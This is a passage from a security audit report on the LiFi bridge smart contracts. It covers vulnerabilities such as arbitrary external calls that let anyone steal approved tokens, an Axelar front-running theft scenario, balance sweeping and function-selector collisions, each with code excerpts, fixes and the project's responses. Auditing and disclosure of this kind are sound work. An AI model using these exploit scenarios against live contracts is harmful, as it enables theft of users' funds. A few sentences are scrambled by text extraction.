safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), "SafeERC20: approve from non-zero to non-zero allowance" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } There are four instance of this issue: • AxelarFacet.sol is directly using approve function which does not check return value of an external function. The faucet should utilize LibAsset.maxApproveERC20() function like the other faucets. • LibAsset ’s LibAsset.maxApproveERC20() function is used on the other faucets. For instance, USDT’s ap- proval mechanism reverts if current allowance is nonzero. From that reason, the function can approve with zero first or safeIncreaseAllowance can be utilized. • FusePoolZap.sol is also using approve function which does not check return value . The contract does not import any other libraries, that being the case, the contract should use safeApprove function with approving zero. • Executor.sol is directly using approve function which does not check return value of an external function. The contract should utilize LibAsset.maxApproveERC20() function like the other contracts. Recommendation: Approve with a zero amount first before setting the actual amount or safeIncreaseAllowance can be utilized in the LibAsset.maxApproveERC20() function. LiFi: Fixed with PR #10. Spearbit: Verified. +5.1.6 Too generic calls in GenericBridgeFacet allow stealing of tokens Severity: High Risk Context: GenericBridgeFacet.sol#L69-L120, LibSwap.sol#L30-L68 Description: With the contract GenericBridgeFacet, the functions swapAndStartBridgeTokensGeneric() (via LibSwap.swap()) and _startBridge() allow arbitrary functions calls, which allow anyone to call transferFrom() and steal tokens from anyone who has given a large allowance to the LiFi protocol. This has been used to hack LiFi in the past. The followings risks also are present: • call the Lifi Diamand itself via functions that don’t have nonReentrant. • perhaps cancel transfers of other users. • call functions that are protected by a check on this, like completeBridgeTokensViaStargate. 10 contract GenericBridgeFacet is ILiFi, ReentrancyGuard { function swapAndStartBridgeTokensGeneric( ... LibSwap.swap(_lifiData.transactionId, _swapData[i]); ... } function _startBridge(BridgeData memory _bridgeData) internal { ... (bool success, bytes memory res) = _bridgeData.callTo.call{ value: value ,! }(_bridgeData.callData); ... } } library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } } Recommendation: Whitelist the external call addresses and function signatures for both the dexes and the bridges. Note: SwapperV2 already contains whitelist functionality for dexes, but isn’t used from this contract. Alternatively make sure this code isn’t added to the Lifi Diamond anymore. For example, by removing the code from the repository and/or adding a warning inside the code itself. LiFi: It has been removed from all contracts deployments since the exploit. We do not plan to enable it again, so we can remove it from the repository. PR #4 Spearbit: The issue is solved with deleting GenericBridgeFacet contract. +5.1.7 LiFi protocol isn’t hardened Severity: High Risk Context: Lifi src Description: The usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs and doesn’t verify them. Several elements are not connected via smart contracts but via the API, for example: • the emits of LiFiTransferStarted versus the bridge transactions. • the fees paid to the FeeCollector versus the bridge transactions. • the Periphery contracts as defined in the PeripheryRegistryFacet versus the rest. In case the API and or frontend contain errors or are hacked then tokens could be easily lost. Also, when calling the LiFi contracts directly or via other smart contracts, it is rather trivial to commit mistakes and loose tokens. Emit data can be easily disturbed by malicious actors, making it unusable. The payment of fees can be easily circumvented by accessing the contracts directly. It is easy to make fake websites which trick users into signing transactions which seem to be for LiFi but result in loosing tokens. With the current design, the power of smart contracts isn’t used and it introduces numerous risks as described in the rest of this report. Recommendation: Determine if you want the LiFi protocol also to be used at a smart contract level (e.g. to be integrated in other smart contracts). • If so: then harden the functions and connect them. 11 • If not: then add access controls and/or verification checks in all the bridge functions to verify that transactions and values only originate from the LiFi APIs. This can be done by signing data or white-listing the calling addresses. LiFi: After discussing this internally, we have decided that for now we plan to keep the protocol as is and rely on the API to generate correct behavior. We don’t plan to lock the protocol down in such a way to prevent developers from using the contracts freely. We acknowledge the risks inherent in that and plan to mitigate as much as possible without a full lockdown. Spearbit: Acknowledged. +5.1.8 Bridge with Axelar can be stolen with malicious external call Severity: High Risk Context: Executor.sol#L272-L288 Executor.sol#L323-L333 Executor.sol#L269-L288 Description: Executor contract allows users to build an arbitrary payload external call to any address except address(erc20Proxy). erc20Proxy is not the only dangerous address to call. By building a malicious external call to Axelar gateway, exploiters can steal users’ funds. The Executor does swaps at the destination chain. By setting the receiver address to the Executor contract at the destination chain, Li-Fi can help users to get the best price. Executor inherits IAxelarExecutable. execute and executeWithToken validates the payload and executes the external call. IAxelarExecutable.sol#L27-L40 function executeWithToken( bytes32 commandId, string calldata sourceChain, string calldata sourceAddress, bytes calldata payload, string calldata tokenSymbol, uint256 amount ) external { bytes32 payloadHash = keccak256(payload); if (!gateway.validateContractCallAndMint(commandId, sourceChain, sourceAddress, payloadHash, ,! tokenSymbol, amount)) revert NotApprovedByGateway(); _executeWithToken(sourceChain, sourceAddress, payload, tokenSymbol, amount); } The nuance lies in the Axelar gateway AxelarGateway.sol#L133-L148. Once the receiver calls validateContract- CallAndMint with a valid payload, the gateway mints the tokens to the receiver and marks it as executed. It is the receiver contract’s responsibility to execute the external call. Exploiters can build a malicious external call to trigger validateContractCallAndMint, the Axelar gateway would mint the tokens to the Executor contract. The exploiter can then pull the tokens from the Executor contract. The possible exploit scenario 1. Exploiter build a malicious external call. token.approve(address(exploiter), type(uint256).max) 2. A victim user uses the AxelarFacet to bridge tokens. Since the destination bridge has the best price, the users set the receiver to address(Executor) and finish the swap with this.swapAndCompleteBridgeTokens 3. Exploiter observes the victim’s bridge tx and way.validateContractCallAndMint. exploiter can pull the minted token from the executor contract since there’s max allowance. The executor the minted token. builds an contract gets external call to trigger gate- The 4. The victim calls Executor.execute() with the valid payload. However, since the payload has been triggered by the exploiter, it’s no longer valid. 12 Recommendation: Allowing users to build arbitrary external calls is dangerous. Especially when Li-Fi supports a variety of bridges and chains. There are nuances that lie in different bridge services or chains’ precompiled contracts. Recommend to use the whitelist in the executor contract like the main contract. An alternative way to support arbitrary fn call is to separate the IAxelarExecutable from the Executor contract, and never set the Axelar’s receiver to the Executor contract. LiFi: Fixed with PR #12. Spearbit: Verified. 5.2 Medium Risk +5.2.1 LibSwap may pull tokens that are different from the specified asset Severity: Medium Risk Context: LibSwap.sol#L30-L55 Description: LibSwap.swap is responsible for doing swaps. It’s designed to swap one asset at a time. The _- swapData.callData is provided by user and the LiFi protocol only checks its signature. As a result, users can build a calldata to swap a different asset as specified. For example, the users can set fromAssetId = dai provided addLiquidity(usdc, dai, ...) as call data. The uniswap router would pull usdc and dai at the same time. If there were remaining tokens left in the LiFi protocol, users can sweep tokens from the protocol. library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... if (!LibAsset.isNativeAsset(fromAssetId)) { LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount); if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } else { nativeValue = fromAmount; } // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); if (!success) { string memory reason = LibUtil.getRevertMsg(res); revert(reason); } } Recommendation: Recommend clearing the allowance after the external call. 13 if (!LibAsset.isNativeAsset(fromAssetId)) { LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount); if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } else { nativeValue = fromAmount; } // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); // @audit: clear the allowance IERC20(fromAssetId).safeApprove(_swapData.approveTo, 0); if (!success) { string memory reason = LibUtil.getRevertMsg(res); revert(reason); } LiFi: LiFi Team claims that they acknowledge the risk but will encourage the user to utilize our api and pass correct calldata rather than strictly check this at the contract level. Spearbit: Acknowledged. +5.2.2 Check slippage of swaps Severity: Medium Risk Context: OmniBridgeFacet.sol#L63-L65 Description: Several bridges check that the output of swaps isn’t 0. However it could also happen that swap give a positive output, but still lower than expected due to slippage / sandwiching / MEV. Several AMMs will have a mechanism to limit slippage, but it might be useful to add a generic mechanism as multiple swaps in sequence might have a relative large slippage. function swapAndStartBridgeTokensViaOmniBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); if (amount == 0) { revert InvalidAmount(); } _startBridge(_lifiData, _bridgeData, amount, true); } Recommendation: Consider adding a slippage check by specifying a minimum amount of expected tokens. At least add a check for amount==0 in all bridges. LiFi: Fixed with PR #75. Spearbit: Verified. 14 +5.2.3 Replace createRetryableTicketNoRefundAliasRewrite() with depositEth() Severity: Medium Risk Context: ArbitrumBridgeFacet.sol#L90-L137 Description: The function _startBridge() of the ArbitrumBridgeFacet uses createRetryableTicketNoRefun- dAliasRewrite(). According to the docs: address-aliasing, this method skips some address rewrite magic that depositEth() does. Normally depositEth() should be used, according to the docs depositing-and-withdrawing-ether. Also this method will be deprecated after nitro: Inbox.sol#L283-L297. While the bridge doesn’t do these checks of depositEth(), it is easy for developers, that call the LiFi contracts directly, to make mistakes and loose tokens. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }(...); } ... ... } Recommendation: Replace createRetryableTicketNoRefundAliasRewrite() with depositEth(). LiFi: In principle, retryable tickets can alternatively be used to deposit Ether; this could be preferable to the special eth-deposit message type if, e.g., more flexibility for the destination address is needed, or if one wants to trigger the fallback function on the L2 side. Reverted with PR #79. Spearbit: Verified. +5.2.4 Hardcode or whitelist the Axelar destinationAddress Severity: Medium Risk Context: AxelarFacet.sol#L30-L89 Description: The functions executeCallViaAxelar() and executeCallWithTokenViaAxelar() call a destina- tionAddress on the destinationChain. This destinationAddress needs to have specific Axelar functions (_ex- ecute() and _executeWithTokento() ) be able to receive the calls. This is implemented in the Executor. If these functions don’t exist at the destinationAddress, the transferred tokens will be lost. /// @param destinationAddress the address of the LiFi contract on the destinationChain function executeCallViaAxelar(..., string memory destinationAddress, ...) ... { ... s.gateway.callContract(destinationChain, destinationAddress, payload); } Note: the comment "the address of the LiFi contract" isn’t clear, it could either be the LiFi Diamond or the Execu- tor. Recommendation: Hardcode or whitelist the destinationAddress. Doublecheck the @param comment for des- tinationAddress (for both functions). LiFi: We acknowledge the risk and recommend all users utilize our API in order to pass correct data and pass invalid contract addresses at their own risk. Spearbit: Acknowledged. 15 +5.2.5 WormholeFacet doesn’t send native token Severity: Medium Risk Context: WormholeFacet.sol#L36-L103 Description: The functions of WormholeFacet allow sending the native token, however they don’t actually send it across the bridge, causing the native token to stay stuck in the LiFi Diamond and get lost for the sender. contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { function startBridgeTokensViaWormhole(... ) ... payable ... { // is payable LibAsset.depositAsset(_wormholeData.token, _wormholeData.amount); // allows native token _startBridge(_wormholeData); ... } function _startBridge(WormholeData memory _wormholeData) private { ... LibAsset.maxApproveERC20(...); // geared towards ERC20, also works when `msg.value` is set // no { value : .... } IWormholeRouter(_wormholeData.wormholeRouter).transferTokens(...); } } Recommendation: Remove the payable keyword and/or check msg.value == 0. Alternatively support sending the native token. This can be done via wrapAndTransferETH() of wormhole bridge. Note: also see issue "Consider using wrapped native token" LiFi: Fixed with PR #76. Spearbit: Verified. +5.2.6 ArbitrumBridgeFacet does not check if msg.value is enough to cover the cost Severity: Medium Risk Context: ArbitrumBridgeFacet.sol#L97-L121 Description: The ArbitrumBridgeFacet does not check whether the users’ provided ether (msg.value) is enough to cover _amount + cost. If there are remaining ethers in LiFi’s LibDiamond address, exploiters can set a large cost and sweep the ether. function _startBridge( ... ) private { ... uint256 cost = _bridgeData.maxSubmissionCost + _bridgeData.maxGas * _bridgeData.maxGasPrice; if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }( ... ); } else { gatewayRouter.outboundTransfer{ value: cost }( ... ); } Recommendation: Always check the inbound ether is enough to cover the outbound ether. There are different possible cases. • startBridgeTokensViaArbitrumBridge and assetId != NATIVE_ASSET. – check msg.value > cost 16 • startBridgeTokensViaArbitrumBridge and assetId == NATIVE_ASSET. – check msg.value > cost + amount • swapAndStartBridgeTokensViaArbitrumBridge and assetId != NATIVE_ASSET – calculates received _ether = post_swap_ether - pre_swap_ether and checks received _ether > cost • swapAndStartBridgeTokensViaArbitrumBridge and assetId == NATIVE_ASSET – calculates received _ether = post_swap_ether - pre_swap_ether and checks received _ether > amount + cost LiFi: Fixed with PR #104. Spearbit: Verified. +5.2.7 Underpaying Optimism l2gas may lead to loss of funds Severity: Medium Risk Context: OptimismBridgeFacet.sol#L97-L113 Description: The OptimismBridgeFacet uses Optimism’s bridge with user-provided l2gas. function _startBridge( LiFiData calldata _lifiData, BridgeData calldata _bridgeData, uint256 _amount, bool _hasSourceSwap ) private { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.depositETHTo{ value: _amount }(_bridgeData.receiver, _bridgeData.l2Gas, ""); } else { ... bridge.depositERC20To( _bridgeData.assetId, _bridgeData.assetIdOnL2, _bridgeData.receiver, _amount, _bridgeData.l2Gas, "" ); } } Optimism’s standard token bridge makes the cross-chain deposit by sending a cross-chain message to L2Bridge. L1StandardBridge.sol#L114-L123 17 // Construct calldata for finalizeDeposit call bytes memory message = abi.encodeWithSelector( IL2ERC20Bridge.finalizeDeposit.selector, address(0), Lib_PredeployAddresses.OVM_ETH, _from, _to, msg.value, _data ); // Send calldata into L2 // slither-disable-next-line reentrancy-events sendCrossDomainMessage(l2TokenBridge, _l2Gas, message); If the l2Gas is underpaid, finalizeDeposit will fail and user funds will be lost. Recommendation: Given the potential risks of losing users’ funds, we recommend to emphasize the risks in the documents. LiFi: Docs added in PR #78. Spearbit: Verified. +5.2.8 Funds can be locked during the recovery stage Severity: Low Risk Context: AmarokFacet.sol#L133 Description: The recovery is an address that should receive funds if the execution fails on destination do- main. This ensures that funds are never lost with failed calls. However, in the AmarokFacet It is hardcoded as msg.sender. Several unexpected behaviour can be observed with this implementation. • If the msg.sender is a smart contract, It might not be available on the destination chain. • If the msg.sender is a smart contract and deployed on the other chain, the contract maybe will not have function to withdraw native token. As a result of this implementation, funds can be locked when an execution fails. 18 contract AmarokFacet is ILiFi, SwapperV2, ReentrancyGuard { ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... } Recommendation: Consider taking recovery parameter as an argument. LiFi: Fixed with PR #28. Spearbit: Verified. +5.2.9 What if the receiver of Axelar _executeWithToken() doesn’t claim all tokens Severity: Medium Risk Context: Executor.sol#L293-L316 Description: The function _executeWithToken() approves tokens and then calls callTo. If that contract doesn’t retrieve the tokens then the tokens stay within the Executor and are lost. Also see: "Remaining tokens can be sweeped from the LiFi Diamond or the Executor" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... // transfer received tokens to the recipient IERC20(tokenAddress).approve(callTo, amount); (bool success, ) = callTo.call(callData); ... } } Recommendation: Consider sending the remaining tokens to a recovery address. Document the token handling in AxelarFacet.md LiFi: Fixed with PR #62. Spearbit: Verified. 19 +5.2.10 Remaining tokens can be sweeped from the LiFi Diamond or the Executor Severity: Medium Risk Context: Executor.sol#L143-L149, Executor.sol#L191-L199, Executor.sol#L242-L249, Executor.sol#L338-L345 Description: The initial balance of (native) tokens in both the Lifi Diamond and the Executor contract can be sweeped by all the swap functions in all the bridges, which use the following functions: • swapAndCompleteBridgeTokensViaStargate() of Executor.sol • swapAndCompleteBridgeTokens() of Executor.sol • swapAndExecute() of Executor.sol • _executeAndCheckSwaps() of SwapperV2.sol • _executeAndCheckSwaps() of Swapper.sol • swapAndCompleteBridgeTokens() of XChainExecFacet Although these functions ... • swapAndCompleteBridgeTokensViaStargate() of Executor.sol • swapAndCompleteBridgeTokens() of Executor.sol • swapAndExecute() of Executor.sol • swapAndCompleteBridgeTokens() of XChainExecFacet have the following code: if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // sometimes transfer tokens in } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } // do swaps uint256 postSwapBalance = LibAsset.getOwnBalance(transferredAssetId); if (postSwapBalance > startingBalance) { LibAsset.transferAsset(transferredAssetId, receiver, postSwapBalance - startingBalance); } This doesn’t protect the initial balance of the first tokens, because it can just be part of a swap to another token. The initial balances of intermediate tokens are not checked or protected. As there normally shouldn’t be (native) tokens in the LiFi Diamond or the Executor the risk is limited. Note: set the risk to medium as there are other issues in this report that leave tokens in the contracts Although in practice there is some dust in the LiFi Diamond and the Executor: • 0x362fa9d0bca5d19f743db50738345ce2b40ec99f • 0x46405a9f361c1b9fc09f2c83714f806ff249dae7 Recommendation: Consider whether any tokens left in the LiFi Diamond and the Executor should be taken into account. • If so: for every (intermediate) swap determine initial amount of (native) token and make sure this isn’t swapped. • If not: remove the code with the startingBalance. also analyse all occurances of tokens in the LiFi Diamond and the Executor to determine its source. LiFi: Fixed with PR #94. Spearbit: Verified. 20 +5.2.11 Wormhole bridge chain IDs are different than EVM chain IDs Severity: Medium Risk Context: WormholeFacet.sol#L93 Description: According to documentation, Wormhole uses different chain ids than EVM based chain ids. However, the code is implemented with block.chainid check. LiFi is integrated with third party platforms through API. The API/UI side can implement chain id checks, but direct interaction with the contract can lead to loss of funds. function _startBridge(WormholeData memory _wormholeData) private { if (block.chainid == _wormholeData.toChainId) revert CannotBridgeToSameNetwork(); } From other perspective, the following line limits the recipient address to an EVM address. done to a non EVM chain (e.g. Solana, Terra, Terra classic), then the tokens would be lost. If a bridge would be ... bytes32(uint256(uint160(_wormholeData.recipient))) ... Example transactions below. • Chainid 1 Solana • Chainid 3 Terra Classic On the other hand, the usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. As previously mentioned, the wormhole destination chain ids are different than standard EVM based chains, the following event can be misinterpreted. ... emit LiFiTransferStarted( _lifiData.transactionId, "wormhole", "", _lifiData.integrator, _lifiData.referrer, _swapData[0].sendingAssetId, _lifiData.receivingAssetId, _wormholeData.recipient, _swapData[0].fromAmount, _wormholeData.toChainId, // It does not show correct chain id which is expected by LiFi Data Analytics true, false ,! ); ... Recommendation: Consider having a mapping of the EVM chainid to the wormhole chainid, so a smart contract user (developer) of the lifi protocol can always use the same chainid. If tokens are accidentally sent to the wrong chain they might be unrecoverable. For instance, if the destination is a smart contract that isn’t deployed on that chain. LiFi: Fixed with PR #29. Spearbit: Verified. 21 +5.2.12 Facets approve arbitrary addresses for ERC20 tokens Severity: Medium Risk AcrossFacet.sol#L103, ArbitrumBridge- Context: Facet.sol#L111, GnosisBridgeFacet.sol#L119, HopFacet.sol#L106, HyphenFacet.sol#L101, NXTPFacet.sol#L127, OmniBridgeFacet.sol#L88, OptimismBridge- Facet.sol#L100, PolygonBridgeFacet.sol#L101, StargateFacet.sol#L229, WormholeFacet.sol#L94 GenericBridgeFacet.sol#L111, AnyswapFacet.sol#L127, CBridgeFacet.sol#L103, AmarokFacet.sol#L145, Description: All the facets pointed above approve an address for an ERC20 token, where both these values are provided by the user: LibAsset.maxApproveERC20(IERC20(token), router, amount); The parameter names change depending on the context. So for any ERC20 token that LifiDiamond contract holds, user can: • call any of the functions in these facets to approve another address for that token. • use the approved address to transfer tokens out of LifiDiamond contract. Note: normally there shouldn’t be any tokens in the LiFi Diamond contract so the risk is limited. Note: also see "Hardcode bridge addresses via immutable" Recommendation: For each bridge facet, the bridge approval contract address is already known. Store these addresses in an immutable or a storage variable instead of taking it as a user input. Only approve and interact with these pre-defined addresses. LiFi: Fixed with PR #79, PR #102, PR #103 Spearbit: Verified. +5.2.13 FeeCollector not well integrated Severity: Medium Risk Context: FeeCollector.sol Description: There is a contract to pay fees for using the bridge: FeeCollector. This is used by crafting a transaction by the frontend API, which then calls the contract via _executeAndCheckSwaps(). Here is an example of the contract Here is an example of the contract of such a transaction Its whitelisted here This way no fees are paid if a developer is using the LiFi contracts directly. Also it is using a mechanism that isn’t suited for this. The _executeAndCheckSwaps() is geared for swaps and has several checks on balances. These (and future) checks could interfere with the fee payments. Also this is a complicated and non transparent approach. The project has suggested to see _executeAndCheckSwaps() as a multicall mechanism. Recommendation: Use a dedicated mechanism to pay for fees. If _executeAndCheckSwaps() is intended to be a multicall mechanism then rename the function. LiFi: We acknowledge the risk and encourage integrators to utilize our API at this time. Spearbit: Acknowledged. 22 +5.2.14 _executeSwaps of Executor.sol doesn’t have a whitelist Severity: Medium Risk Context: Executor.sol#L323-L333, SwapperV2.sol#L67-L81 Description: The function _executeSwaps() of Executor.sol doesn’t have a whitelist, whereas _executeSwaps() of SwapperV2.sol does have a whitelist. Calling arbitrary addresses is dangerous. For example, unlimited al- lowances can be set to allow stealing of leftover tokens in the Executor contract. Luckily, there wouldn’t normally be allowances set from users to the Executor.sol so the risk is limited. Note: also see "Too generic calls in GenericBridgeFacet allow stealing of tokens" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } contract SwapperV2 is ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { LibSwap.SwapData calldata currentSwapData = _swapData[i]; if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } Based on the comments of the LiFi project there is also the use case to call more generic contracts, which do not return any token, e.g., NFT buy, carbon offset. It probably better to create new functionality to do this. Recommendation: Reuse the code of SwapperV2.sol. Note: Having a whitelist also makes sure erc20Proxy won’t be called. Note: This also requires adding a management interface for the whitelist, like DexManager- Facet.sol. Note: Also see issue "Move whitelist to LibSwap.swap()" Consider creating additional functionality for non-dex calls. Here whitelists also will be useful. LiFi: LiFi Team claims that they acknowledge the risk but plan to keep this contract open as it is separate from the main LIFI protocol contract and want to allow developers to call whatever they wish. Spearbit: Acknowledged. 23 +5.2.15 Processing of end balances Severity: Medium Risk Context: SwapperV2.sol#L22-L60, Executor.sol#L41-L57, Swapper.sol#L22-L38 Description: The contract SwapperV2 has the following construction (twice) to prevent using any already start balance. • it gets a start balance. • does an action. • if the end balance > start balance. then it uses the difference. else (which includes start balance == end balance) it uses the end balance. So if the else clause it reached it uses the end balance and ignores any start balance. If the action hasn’t changed the balances then start balance == end balance and this amount is used. When the action has lowered the balances then end balance is also used. This defeats the code’s purpose. Note: normally there shouldn’t be any tokens in the LiFi Diamond contract so the risk is limited. Note Swapper.sol has similar code. contract SwapperV2 is ILiFi { modifier noLeftovers(LibSwap.SwapData[] calldata _swapData, address payable _receiver) { ... uint256[] memory initialBalances = _fetchBalances(_swapData); ... // all kinds of actions newBalance = LibAsset.getOwnBalance(curAsset); curBalance = newBalance > initialBalances[i] ? newBalance - initialBalances[i] : newBalance; ... } function _executeAndCheckSwaps(...) ... { ... uint256 swapBalance = LibAsset.getOwnBalance(finalTokenId); ... // all kinds of actions uint256 newBalance = LibAsset.getOwnBalance(finalTokenId); swapBalance = newBalance > swapBalance ? newBalance - swapBalance : newBalance; ... } Recommendation: Consider whether any tokens left in the LiFi Diamond should be taken into account. • If it is then change newBalance in the else clauses to 0. • If not then the initial balances are not relevant code can be simplified. Note: Executor.sol and Swapper.sol have comparable code which is different. Note: also see issue "Processing of initial balances". Note: also see issue "Integrate all variants of _executeAndCheckSwaps()". LiFi: Fixed with PR #94. Spearbit: Verified. Note : It’s still not safe to keep tokens in the LibDiamond contract. 24 +5.2.16 Processing of initial balances Severity: Medium Risk Context: Swapper.sol#L22-L38, Swapper.sol#L83-L96, SwapperV2.sol#L22-L39, SwapperV2.sol#L86-L93, Executor.sol#L143-L149, Executor.sol#L338-L345, XChainExecFacet.sol#L30-L38 Executor.sol#L191-L199, Executor.sol#L242-L249, Description: The LiFi code bases contains two similar source files: Swapper.sol and SwapperV2.sol. One of the differences is the processing of msg.value for native tokens, see pieces of code below. The implementation of SwapperV2.sol sends previously available native token to the msg.sender. The following is exploit example. Assume that: • the LiFi Diamond contract contains 0.1 ETH. • a call is done with msg.value == 1 ETH. • and _swapData[0].fromAmount ETH, which is the amount to be swapped. Option 1Swapper.sol: initialBalances == 1.1 ETH - 1 ETH == 0.1 ETH. Option 2 SwapperV2.sol: initialBalances == 1.1 ETH. After the swap getOwnBalance()is1.1 - 0.5 == 0.6 ETH. Option 1 Swapper.sol: returns 0.6 - 0.1 = 0.5 ETH. Option 2 SwapperV2.sol: returns 0.6 ETH‘ (so includes the previously present ETH). 0.5 == Note: the implementations of noLeftovers() are also different in Swapper.sol and SwapperV2.sol. Note: this is also related to the issue "Pulling tokens by LibSwap.swap() is counterintuitive", because the ERC20 are pulled in via LibSwap.swap(), whereas the msg.value is directly added to the balance. As there normally shouldn’t be any token in the LiFi Diamond contract the risk is limited. contract Swapper is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { address asset = _swapData[i].receivingAssetId; uint256 balance = LibAsset.getOwnBalance(asset); if (LibAsset.isNativeAsset(asset)) { balances[i] = balance - msg.value; } else { balances[i] = balance; } } return balances; } } contract SwapperV2 is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { balances[i] = LibAsset.getOwnBalance(_swapData[i].receivingAssetId); } ... } } The following functions do a comparable processing of msg.value for the initial balance: • swapAndCompleteBridgeTokensViaStargate() of Executor.sol • swapAndCompleteBridgeTokens() of Executor.sol • swapAndExecute() of Executor.sol • swapAndCompleteBridgeTokens() of XChainExecFacet 25 if (!LibAsset.isNativeAsset(transferredAssetId)) { ... } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } However in Executor.sol function swapAndCompleteBridgeTokensViaStargate() isn’t optimal for ERC20 tokens because ERC20 tokens are already deposited in the contract before calling this function. function swapAndCompleteBridgeTokensViaStargate(... ) ... { ... if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // doesn't correct for initial balance } else { ... } ,! } So assume: • 0.1 ETH was in the contract. • 1 ETH was added by the bridge. • 0.5 ETH is swapped. Then the StartingBalance is calculated to be 0.1 ETH + 1 ETH == 1.1 ETH. So no funds are returned to the receiver as the end balance is 1.1 ETH - 0.5 ETH == 0.6 ETH, is smaller than 1.1 ETH. Whereas this should have been (1.1 ETH - 0.5 ETH) - 0.1 ETH == 0.5 ETH. Recommendation: First implement the suggestions of "Pulling tokens by LibSwap.swap() is counterintuitive". Also consider implementing the suggestions of "Consider using wrapped native token". Also consider whether any tokens left in the LiFi Diamond and the Executor should be taken into account. • If they are: use the correction with msg.value everywhere in function swapAndCompleteBridgeTokensViaS- targate() of Executor.sol code, make a correction of the initial balance with the received tokens. • If not: then the initial balances are not relevant and fetchBalances() and the comparable code in other functions can be removed. Also see "Processing of end balances". Also see "Integrate all variants of _executeAndCheckSwaps()". LiFi: Fixed with PR #94. Spearbit: Verified. +5.2.17 Improve dexAllowlist Severity: Medium Risk Context: SwapperV2.sol#L67-L81, Swapper.sol#L65-L78, LibAccess.sol#L13-L15, DexManagerFacet.sol, Ac- cessManagerFacet.sol Description: The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. The checks for approveTo, callTo and signature (callData) are independent. This means that any signature is valid for any dex combined with any approveTo address. This grands more access than necessary. This is important because multiple functions can have the same signature. For example these two functions have the same signature: • gasprice_bit_ether(int128) 26 • transferFrom(address,address,uint256) See bytes4_signature=0x23b872dd Note: brute forcing an innocent looking function is straightforward The transferFrom() is especially dangerous because it allows sweeping tokens from other users that have set an allowance for the LiFi Diamond. If someone gets a dex whitelisted, which contains a function with the same signature then this can be abused in the current code. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); ... } } Recommendation: In the whitelisting manager DexManagerFacet.sol, combine the dex_address, approveTo and signature as a set and whitelist them as a triple. Adapt the rest of the code (e.g. SwapperV2.sol and Swapper.sol) to match that. Note: the library LibAccess, which does something similar already stores the duo executor address and signa- ture. For extra safety: before whitelisting, double check the function signatures using 4byte.directory or sig.eth.samczun, both for the DexManagerFacet.sol and AccessManagerFacet.sol. LiFi: We vet all of the DEX addresses before we add to our whitelist and and quit a few of them share the same functions. We acknowledge the risk and plan to mitigate through careful vetting of our whitelist. This should avoid selector collisions. Spearbit: Acknowledged, careful checking prevents the issue. +5.2.18 Pulling tokens by LibSwap.swap() is counterintuitive Severity: Medium Risk Context: LibSwap.sol#L30-L68, SwapperV2.sol#L67-L81, Swapper.sol#L65-L78, Executor.sol#L323-L333 Description: The function LibSwap.swap() pulls in tokens via transferFromERC20() from msg.sender when needed. When put in a loop, via _executeSwaps(), it can 